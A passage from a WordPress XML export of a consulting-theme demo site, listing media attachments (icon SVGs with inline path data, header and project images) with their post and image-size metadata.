s4.486-10.001,10-10.001s10,4.486,10,10.001S125.629,214.231,120.115,214.231z M188.951,175.146c-5.514,0-10-4.486-10-10.001   c0-5.514,4.486-10,10-10s10,4.486,10,10C198.952,170.66,194.465,175.146,188.951,175.146z M257.787,214.231   c-5.514,0-10-4.486-10-10.001s4.486-10.001,10-10.001c5.515,0,10.001,4.486,10.001,10.001S263.301,214.231,257.787,214.231z"></path>
	<path d="M418.796,376.965H366.31H80.428H21.215c-3.427,0-6.215-2.788-6.215-6.215V61.331c0-3.427,2.788-6.215,6.215-6.215h35.356   c4.142,0,7.5-3.357,7.5-7.5s-3.358-7.5-7.5-7.5H21.215C9.517,40.116,0,49.633,0,61.331V370.75c0,11.698,9.517,21.215,21.215,21.215   h51.713v16.506c0,9.403,7.65,17.053,17.053,17.053h75.074l-35.34,68.998c-1.888,3.687-0.431,8.206,3.256,10.095   c1.094,0.561,2.262,0.826,3.413,0.826c2.725,0,5.354-1.49,6.681-4.083l38.843-75.836h82.922l38.843,75.836   c1.328,2.593,3.956,4.083,6.681,4.083c1.151,0,2.319-0.267,3.413-0.826c3.687-1.889,5.145-6.408,3.256-10.095l-35.34-68.998h75.074   c9.403,0,17.053-7.649,17.053-17.053v-16.506h44.986c4.142,0,7.5-3.357,7.5-7.5S422.938,376.965,418.796,376.965z M358.81,408.471   c0,1.132-0.921,2.053-2.053,2.053H89.981c-1.132,0-2.053-0.921-2.053-2.053v-16.506H358.81V408.471z"></path>
	<path d="M86.571,55.116h102.672h68.251h168.028c3.427,0,6.215,2.788,6.215,6.215v71.311c0,4.143,3.358,7.5,7.5,7.5   s7.5-3.357,7.5-7.5V61.331c0-11.698-9.517-21.215-21.215-21.215H264.995V25.374c0-10.375-8.441-18.816-18.817-18.816H200.56   c-10.375,0-18.817,8.441-18.817,18.816v14.742H86.571c-4.142,0-7.5,3.357-7.5,7.5S82.429,55.116,86.571,55.116z M196.743,25.374   c0-2.104,1.712-3.816,3.817-3.816h45.618c2.104,0,3.817,1.712,3.817,3.816v14.742h-53.251V25.374z"></path>
	<path d="M104.902,267.576c-4.142,0-7.5,3.357-7.5,7.5v66.272c0,4.143,3.358,7.5,7.5,7.5h30.427c4.142,0,7.5-3.357,7.5-7.5v-66.272   c0-4.143-3.358-7.5-7.5-7.5H104.902z M127.829,333.849h-15.427v-51.272h15.427V333.849z"></path>
	<path d="M173.737,229.248c-4.142,0-7.5,3.357-7.5,7.5v104.601c0,4.143,3.358,7.5,7.5,7.5h30.427c4.142,0,7.5-3.357,7.5-7.5V236.748   c0-4.143-3.358-7.5-7.5-7.5H173.737z M196.665,333.849h-15.427v-89.601h15.427V333.849z"></path>
	<path d="M242.573,267.576c-4.142,0-7.5,3.357-7.5,7.5v66.272c0,4.143,3.358,7.5,7.5,7.5H273c4.142,0,7.5-3.357,7.5-7.5v-66.272   c0-4.143-3.358-7.5-7.5-7.5H242.573z M265.5,333.849h-15.427v-51.272H265.5V333.849z"></path>
	<path d="M311.409,311.832c-4.142,0-7.5,3.357-7.5,7.5v22.017c0,4.143,3.358,7.5,7.5,7.5h30.427c4.142,0,7.5-3.357,7.5-7.5   s-3.358-7.5-7.5-7.5h-22.927v-14.517C318.909,315.189,315.551,311.832,311.409,311.832z"></path>
	<path d="M508.175,384.019l-43.027-74.526c10.901-11.619,18.839-25.816,23.079-41.64c6.777-25.291,3.299-51.708-9.793-74.384   c-27.026-46.813-87.097-62.906-133.907-35.881c-46.811,27.025-62.906,87.096-35.88,133.907   c13.092,22.676,34.231,38.896,59.522,45.674c8.446,2.263,17.015,3.382,25.53,3.382c7.442,0,14.841-0.856,22.077-2.55l43.018,74.528   c5.273,9.137,14.875,14.25,24.737,14.249c4.833,0,9.729-1.229,14.208-3.813c8.796-5.077,14.261-14.544,14.261-24.706   C512,393.28,510.678,388.357,508.175,384.019z M372.051,322.68c-21.421-5.74-39.326-19.479-50.415-38.685   c-22.89-39.648-9.257-90.526,30.39-113.417c13.043-7.53,27.296-11.106,41.374-11.106c28.715,0,56.683,14.893,72.043,41.497   c11.088,19.206,14.034,41.58,8.294,63.002c-5.74,21.422-19.479,39.325-38.685,50.414   C415.847,325.474,393.473,328.418,372.051,322.68z M490.242,409.973c-6.453,3.726-14.733,1.508-18.456-4.942l-41.388-71.704   c4.148-1.693,8.21-3.673,12.156-5.951c3.949-2.28,7.689-4.818,11.23-7.566l41.4,71.707c1.188,2.061,1.816,4.393,1.816,6.743   C497,403.078,494.41,407.567,490.242,409.973z"></path>
	<path d="M461.542,263.611c5.295-17.056,4.034-35.316-3.551-51.416c-1.766-3.748-6.234-5.354-9.981-3.589   c-3.748,1.766-5.354,6.234-3.588,9.981c5.983,12.7,6.976,27.109,2.795,40.575c-4.204,13.54-13.286,24.903-25.573,31.997   c-13.002,7.508-28.151,9.5-42.652,5.615c-14.502-3.886-26.624-13.187-34.13-26.189c-15.497-26.841-6.267-61.285,20.574-76.782   c19.625-11.329,43.98-9.815,62.051,3.857c3.304,2.5,8.007,1.849,10.506-1.455c2.499-3.303,1.848-8.007-1.456-10.506   c-22.891-17.321-53.745-19.238-78.602-4.887c-16.472,9.51-28.255,24.866-33.178,43.238s-2.396,37.562,7.114,54.034   c9.51,16.473,24.866,28.255,43.238,33.179c6.135,1.644,12.361,2.457,18.546,2.457c12.338,0,24.517-3.236,35.488-9.571   C444.71,295.163,456.216,280.767,461.542,263.611z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>notebook</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/home/notebook/</link>
		<pubDate>Wed, 30 Sep 2020 10:00:59 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/notebook.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1108</wp:post_id>
		<wp:post_date><![CDATA[2020-09-30 10:00:59]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-30 10:00:59]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[notebook]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/notebook.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/notebook.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 511.989 511.989" style="enable-background:new 0 0 511.989 511.989;" xml:space="preserve">
<g>
	<path d="M504.89,145.383L320.201,38.759c-3.291-1.906-7.127-2.413-10.798-1.43c-3.673,0.985-6.74,3.344-8.627,6.628l-12.728,22.041   c-1.799-0.322-3.647-0.5-5.537-0.5H156.94c-4.142,0-7.5,3.357-7.5,7.5s3.358,7.5,7.5,7.5h125.57c9.021,0,16.36,7.334,16.36,16.35   v346.95c0,9.016-7.339,16.351-16.36,16.351H61.05c-9.021,0-16.36-7.335-16.36-16.351v-45.304h18.954   c5.921,0,10.739-4.817,10.739-10.739v-19.435c0-5.921-4.817-10.738-10.739-10.738H10.739C4.817,357.583,0,362.4,0,368.321v19.435   c0,5.922,4.817,10.739,10.739,10.739H29.69v45.304c0,17.287,14.068,31.351,31.36,31.351h221.46c17.292,0,31.36-14.063,31.36-31.351   V307.929l47.71,27.545c1.181,0.682,2.471,1.006,3.743,1.006c2.592,0,5.113-1.345,6.502-3.751c2.071-3.587,0.842-8.174-2.745-10.245   l-55.21-31.875v-23.21l65.26,37.675c1.182,0.682,2.471,1.006,3.743,1.006c2.592,0,5.113-1.345,6.502-3.751   c2.071-3.588,0.842-8.175-2.745-10.245l-72.76-42.005V226.87l82.81,47.814c1.182,0.682,2.471,1.006,3.744,1.006   c2.591,0,5.113-1.345,6.502-3.751c2.071-3.587,0.842-8.174-2.745-10.245l-90.311-52.146v-23.209l100.36,57.945   c1.181,0.682,2.471,1.006,3.743,1.006c2.592,0,5.113-1.345,6.502-3.751c2.071-3.587,0.842-8.174-2.745-10.245l-107.86-62.275   v-72.17c0-10.015-4.727-18.94-12.062-24.684l11.565-20.026l183.342,105.846L337.944,432.978c-3.462-1.548-7.608-0.26-9.548,3.099   c-2.072,3.586-0.845,8.174,2.742,10.246c2.23,1.289,4.669,1.901,7.08,1.901c4.915-0.001,9.707-2.549,12.347-7.105l159.538-276.324   C513.999,158.015,511.665,149.31,504.89,145.383z M15,372.583h44.383v10.912H15V372.583z"></path>
	<path d="M430.955,155.172l-82.268-47.497c-3.588-2.071-8.174-0.843-10.245,2.745c-2.071,3.587-0.842,8.174,2.745,10.245   l82.268,47.497c1.181,0.682,2.471,1.006,3.743,1.006c2.592,0,5.113-1.345,6.502-3.751   C435.771,161.83,434.542,157.243,430.955,155.172z"></path>
	<path d="M10.739,153.406H29.69v55.593c0,4.143,3.358,7.5,7.5,7.5s7.5-3.357,7.5-7.5v-55.593h18.954   c5.921,0,10.739-4.817,10.739-10.739v-19.435c0-5.922-4.817-10.739-10.739-10.739H44.69V96.848c0-9.016,7.339-16.35,16.36-16.35   h65.9c4.142,0,7.5-3.357,7.5-7.5s-3.358-7.5-7.5-7.5h-65.9c-17.292,0-31.36,14.063-31.36,31.35v15.645H10.739   C4.817,112.493,0,117.31,0,123.232v19.435C0,148.589,4.817,153.406,10.739,153.406z M15,127.493h44.383v10.913H15V127.493z"></path>
	<path d="M10.739,275.95h18.952v59.254c0,4.143,3.358,7.5,7.5,7.5s7.5-3.357,7.5-7.5V275.95h18.953   c5.921,0,10.739-4.817,10.739-10.738v-19.435c0-5.922-4.817-10.739-10.739-10.739H10.739C4.817,235.038,0,239.855,0,245.777v19.435   C0,271.133,4.817,275.95,10.739,275.95z M15,250.038h44.383v10.912H15V250.038z"></path>
	<path d="M103.629,147.61v38.978c0,7.112,5.786,12.898,12.898,12.898h110.504c7.112,0,12.898-5.786,12.898-12.898V147.61   c0-7.112-5.786-12.898-12.898-12.898H116.527C109.415,134.712,103.629,140.498,103.629,147.61z M118.629,149.712H224.93v34.774   H118.629V149.712z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>badge</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/home/badge/</link>
		<pubDate>Thu, 01 Oct 2020 07:46:05 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/badge.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1150</wp:post_id>
		<wp:post_date><![CDATA[2020-10-01 07:46:05]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-01 07:46:05]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[badge]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/badge.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/badge.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512 512"><g id="XMLID_2590_"><g id="XMLID_212_"><path id="XMLID_215_" d="m460.459 441.32-86.206-149.314c31.891-30.919 51.747-74.184 51.747-122.006 0-93.738-76.261-170-170-170s-170 76.262-170 170c0 47.822 19.856 91.087 51.748 122.007l-86.207 149.313c-2.023 3.505-1.735 7.884.731 11.093 2.465 3.208 6.622 4.614 10.531 3.563l66.454-17.904 17.722 66.503c1.042 3.911 4.338 6.808 8.351 7.339.44.058.879.087 1.315.087 3.538 0 6.855-1.88 8.657-5l90.698-157.095 90.698 157.094c1.802 3.121 5.12 5 8.657 5 .436 0 .875-.029 1.315-.087 4.012-.531 7.309-3.428 8.351-7.339l17.722-66.503 66.455 17.904c3.91 1.054 8.065-.354 10.531-3.563 2.466-3.208 2.754-7.587.73-11.092zm-354.459-271.32c0-82.71 67.29-150 150-150s150 67.29 150 150-67.29 150-150 150-150-67.29-150-150zm54.076 306.052-14.075-52.819c-.684-2.567-2.362-4.757-4.663-6.085-2.301-1.329-5.035-1.687-7.602-.996l-52.78 14.22 72.221-125.089c24.355 18.556 53.844 30.7 85.933 33.88zm218.188-59.901c-2.567-.691-5.301-.333-7.602.996s-3.979 3.518-4.663 6.085l-14.075 52.819-79.034-136.89c32.089-3.18 61.578-15.324 85.933-33.88l72.22 125.09z"></path><path id="XMLID_885_" d="m193.352 149.609c-2.131 6.565-.384 13.635 4.56 18.451l15.992 15.581-3.769 22.006c-1.165 6.803 1.581 13.548 7.166 17.604 3.155 2.291 6.844 3.454 10.559 3.454 2.862 0 5.739-.691 8.397-2.089l19.759-10.395 19.765 10.384c6.11 3.21 13.374 2.684 18.956-1.375 5.583-4.058 8.325-10.805 7.156-17.607l-3.78-22.005 15.984-15.589c4.941-4.819 6.684-11.89 4.55-18.453-2.135-6.563-7.704-11.256-14.534-12.247l-22.096-3.205-9.886-20.019c-3.056-6.188-9.239-10.03-16.139-10.03-.001 0-.003 0-.005 0-6.901.002-13.085 3.848-16.139 10.038l-9.875 20.024-22.094 3.217c-6.829.996-12.396 5.691-14.527 12.255zm44.706 3.563c3.257-.474 6.072-2.521 7.528-5.472l10.408-21.104 10.42 21.099c1.458 2.951 4.274 4.996 7.531 5.468l23.289 3.378-16.846 16.43c-2.356 2.298-3.431 5.608-2.874 8.852l3.984 23.192-20.832-10.945c-2.913-1.531-6.394-1.53-9.307.002l-20.826 10.956 3.972-23.194c.556-3.244-.521-6.554-2.878-8.851l-16.855-16.421z"></path><path id="XMLID_887_" d="m256 296c69.477 0 126-56.523 126-126 0-51.209-30.58-96.935-77.906-116.493-5.108-2.112-10.953.318-13.061 5.422-2.109 5.104.318 10.952 5.422 13.061 39.817 16.455 65.545 54.927 65.545 98.01 0 58.449-47.551 106-106 106s-106-47.551-106-106c0-43.186 25.812-81.692 65.759-98.098 5.109-2.098 7.55-7.941 5.452-13.049-2.099-5.109-7.94-7.549-13.049-5.452-47.482 19.501-78.162 65.268-78.162 116.599 0 69.477 56.524 126 126 126z"></path><path id="XMLID_888_" d="m256.13 64c2.63 0 5.21-1.07 7.07-2.93s2.93-4.44 2.93-7.07-1.07-5.21-2.93-7.07-4.44-2.93-7.07-2.93-5.21 1.07-7.07 2.93c-1.87 1.86-2.93 4.44-2.93 7.07s1.06 5.21 2.93 7.07c1.86 1.86 4.44 2.93 7.07 2.93z"></path></g></g></svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-shop</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/pheader-shop/</link>
		<pubDate>Thu, 01 Oct 2020 10:58:45 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-shop.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1207</wp:post_id>
		<wp:post_date><![CDATA[2020-10-01 10:58:45]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-01 10:58:45]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-shop]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-shop.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/pheader-shop.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:24:"2020/10/pheader-shop.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:23:"pheader-shop-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:25:"pheader-shop-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"pheader-shop-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"pheader-shop-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:25:"pheader-shop-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"pheader-shop-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"pheader-shop-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:25:"pheader-shop-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:25:"pheader-shop-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/business-consultation/project1/</link>
		<pubDate>Fri, 02 Oct 2020 09:09:53 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project1.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1218</wp:post_id>
		<wp:post_date><![CDATA[2020-10-02 09:09:53]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-02 09:09:53]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>773</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project1.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project1.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1420;s:6:"height";i:1420;s:4:"file";s:20:"2020/09/project1.jpg";s:5:"sizes";a:8:{s:6:"medium";a:4:{s:4:"file";s:20:"project1-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"project1-1024x1024.jpg";s:5:"width";i:1024;s:6:"height";i:1024;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:20:"project1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:20:"project1-768x768.jpg";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:20:"project1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:20:"project1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:21:"project1-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:22:"project1-1200x1200.jpg";s:5:"width";i:1200;s:6:"height";i:1200;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/finance-strategy/project2/</link>
		<pubDate>Fri, 02 Oct 2020 09:10:48 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1220</wp:post_id>
		<wp:post_date><![CDATA[2020-10-02 09:10:48]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-02 09:10:48]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>842</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1420;s:6:"height";i:1630;s:4:"file";s:20:"2020/09/project2.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:20:"project2-261x300.jpg";s:5:"width";i:261;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:21:"project2-892x1024.jpg";s:5:"width";i:892;s:6:"height";i:1024;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:20:"project2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:20:"project2-768x882.jpg";s:5:"width";i:768;s:6:"height";i:882;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:22:"project2-1338x1536.jpg";s:5:"width";i:1338;s:6:"height";i:1536;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:20:"project2-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:20:"project2-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:21:"project2-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:22:"project2-1200x1200.jpg";s:5:"width";i:1200;s:6:"height";i:1200;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>target</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/home/target/</link>
		<pubDate>Mon, 05 Oct 2020 07:57:01 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/target.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1247</wp:post_id>
		<wp:post_date><![CDATA[2020-10-05 07:57:01]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-05 07:57:01]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[target]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/target.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/target.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<path d="M136.53,207.562c0.446,0.08,0.89,0.118,1.327,0.118c3.564,0,6.726-2.552,7.375-6.183   c6.598-36.951,26.111-70.729,54.946-95.113c29.17-24.667,66.308-38.252,104.571-38.252c40.815,0,79.809,15.224,109.798,42.867   c3.044,2.808,7.791,2.614,10.598-0.432s2.614-7.79-0.432-10.598c-32.767-30.204-75.372-46.838-119.964-46.838   c-41.804,0-82.381,14.844-114.257,41.798c-31.498,26.635-52.816,63.545-60.027,103.93   C129.737,202.938,132.452,206.834,136.53,207.562z"></path>
